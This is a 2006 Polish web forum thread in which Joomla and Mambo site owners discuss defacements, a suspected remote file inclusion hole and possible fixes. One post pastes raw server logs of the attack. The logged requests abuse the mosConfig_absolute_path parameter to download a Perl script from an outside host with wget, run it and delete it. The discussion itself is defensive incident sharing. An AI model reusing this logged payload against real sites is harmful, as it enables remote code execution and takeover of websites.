Moj kumpel przyznał się jednak, ze tez ma community bulider - czyzby to nie joomla a ten komponent?
Sogo, Ty też masz ten komponent?
Moj kumpel przyznał się jednak, ze tez ma community bulider - czyzby to nie joomla a ten komponent?
Sogo, Ty też masz ten komponent?
biżuteria etniczna, orientalna, arabska - https://piekielko.com
nie, nie mam, ale włamy u mnie polegały na czym innym, nic nie uszkodzono jedynie podmieniono po jednym pliku.
pozdr.
no u kumpla zrobili podobnie - podmienili kilka plików w ktorych zostawili notkę o sobie. W przypadku mojej witryny wyczyscili wszystko co bylo umieszcozne w folderach. Pliki w głownym katalogu pozostawili a częśc podmienili, aby zostawić swoj podpis.
Teraz dokladniej przyjrzalem sie komponentowi i chyba raczej trudno obwiniac community bulider. W fragmencie POST, który wyzej podałem:
/administrator/components/com_comprofiler/plugin.class.php
nie ma pliku plugin.class.php
A teraz poczytajcie sobie ciekawy artykuł:
http://hack.pl/aktualnosci/tureccy_hackerzy_podmieniaja_polskie_strony_intern etowe_102
Ostanio edytowane przez hazael : 08-08-2006 21:08
biżuteria etniczna, orientalna, arabska - https://piekielko.com
U mnie sytuacja indentyczna jak u Sogo. Z tym że to jest strona jeszcze na starym mambo, więc mnie to nie dziwi, a nie mam na razie czasu sobie aktualizacji zapodać, wieć bawimy się w kotka i myszkę z nadpisywaniem ;)
Prośba, podajęcie swoje konfiguracje. Wersja joomli + ważniejsze dodatki
ale dziwne, bo ja mam ostatnią wersje Joomla z wszelkimi mozliwymi latkami i tez mnie pieknie przeczyszczono...
Admin mowil mi, ze mialem zmasowany atak, duzo atakow bylo pod kontem PHPnuke - moją strone podobno meczyli 2 godziny..
Ostanio edytowane przez hazael : 08-08-2006 21:13
biżuteria etniczna, orientalna, arabska - https://piekielko.com
Ale jak sam stwierdziłeś włam poszedł bokiem przez CB, zobacz na joomlapl.com tam była chyba ostatnio lista dziurawych dodatków
A CB masz w najnowszej wersji?
tak, cały czas na bieżaco sledze joomlapolis i jak tylko cos sie pokazuje, to od razu podpiemiam. W kazdym razie wg tych zapytan polaczonych z moim komponentem nie ma czegos takiego jak plugin.class.php jak dobrze pamientam, to bylo cos takiego w starej wersji. Poza tym, moja strona jest calkowicie zamknieta ten komponent jest jedynie dostepny po zalogowaniu sie na stronoe a wszelkie linki sa maskowane przez OpenSef. No ale jak ktos chce to moze wszystko... :-/
Chociaż z drugiej strony wszystko wskazuje jednak na ten komponent CB - wnioskując z artykułu Dziurawe komponenty zamieszoznego na http://joomlapl.com/ - widac nie został on wzięty pod uwagę, mimo tego ma dziurę bo podobnie jak w poprzednich przypadkach napisanych w artykule do ataku wykorzystywana jest niepoprawna weryfikacja parametru "mosConfig_absolute_path przed wykonaniem funkcji include dla innych plików. na poczatku postu atak wyglada podonie., tez wykorzystuje mosConfig_absolute_path
Ostanio edytowane przez hazael : 08-08-2006 22:10
biżuteria etniczna, orientalna, arabska - https://piekielko.com
Z wiedzą na ten temat u mnie słabiutko, ale może tu jakies wyjasnienie:
http://www.gajdaw.pl/varia/xss.html
JA też się spotkałem z turkami na jednej z moich stron. Joomla 1.03 bez CB .Niżej log z ataku , podmieniono plik konfiguracyjny oraz pare innych plików.
Środek naprawczy wykasowanie wszystkiego i przywrócenie danych z kopi zapasowej.201.244.38.14 - - [10/Jul/2006:02:57:48 +0200] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mischel.cz/testy/autotaps/Fotografie/Velke/tool.gif?&cmd=cd%20/tmp/;wget%20http://www.mischel.cz/testy/autotaps/Fotografie/Velke/mambo.txt;perl%20mambo.txt;rm%20-rf%20mambo.*? HTTP/1.0" 200 2371 "-" "Mozilla/5.0"
201.244.38.14 - - [10/Jul/2006:14:04:25 +0200] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mischel.cz/testy/autotaps/Fotografie/Velke/tool.gif?&cmd=cd%20/tmp/;wget%20http://www.mischel.cz/testy/autotaps/Fotografie/Velke/mambo.txt;perl%20mambo.txt;rm%20-rf%20mambo.*? HTTP/1.0" 200 2371 "-" "Mozilla/5.0"
201.244.38.14 - - [10/Jul/2006:14:04:33 +0200] "GET
201.244.38.14 - - [10/Jul/2006:14:29:03 +0200] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mischel.cz/testy/autotaps/Fotografie/Velke/tool.gif?&cmd=cd%20/tmp/;wget%20http://www.mischel.cz/testy/autotaps/Fotografie/Velke/mambo.txt;perl%20mambo.txt;rm%20-rf%20mambo.*? HTTP/1.0" 200 2371 "-" "Mozilla/5.0"
201.244.38.14 - - [10/Jul/2006:17:30:08 +0200] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mischel.cz/testy/autotaps/Fotografie/Velke/tool.gif?&cmd=cd%20/tmp/;wget%20http://www.mischel.cz/testy/autotaps/Fotografie/Velke/mambo.txt;perl%20mambo.txt;rm%20-rf%20mambo.*? HTTP/1.0" 200 2371 "-" "Mozilla/5.0"
Do pliku .htaccess dopisanew celu blokady tego IPDeny from 201.244.38
Po adresie www.mischel.cz wygląda to na czeskich turków
Użyj funkcji SZUKAJ nim zadasz pytanie, w innym wypadku licz sie z mozliwoscia nieotrzymania odpowiedzi.
Projekt Joomla Power Edition
Ostatnio z takimi przypadkami sie spotkalem na postnuke, w wersji jak mnie pamiec nie myli 0.7.5 - byla generalnie globalna panika, ludzie musieli - powtarzam MUSIELI - przeskoczyc na 7.6.1 - sam przenosilem i pomagalem jednemu koledze znajomego resuscytowac dwa serwisy, postawione na rzeczonym cmsie, pracy bylo co nie miara, bo baza sporo wazyla, niby teoretycznie tylko pozmieniali wpisy w pliku konfiguracyjnym - zamiast pojawic sie witrynka byla jakas strona turecka z powitalnych "ju w bin hakd by cos tam turkisz", ale z przenoszeniem i aktualizacja byl problem, bo tam akurat moduly nie wszystkie pasuja do nowszej wersji. Tak czy siak, jedyna mozliwoscia obrony czasami jest ustawianie wpisow w plikach konfiguracyjnych na sztywno, bez sciezek dostepu w postaci zmiennych, ale to jest sporo pracy bo trzeba wtedy modyfikowac nie jeden plik, choc mysle ze moze sie to oplacic, jesli ktos nie przewiduje pozniejszej aktualizacji oprogramowania tylko mutowanie swojej wlasnej wersji cmsa, czy to joomla,mambo,nuke'owate cmsy i inne.
Przeczytaj o tematyce: programy partnerskie zobacz też jak wygląda darmowa reklama dla Ciebie, no i na deser mam dla Ciebie stronę o pagerank i mały Kurs CSS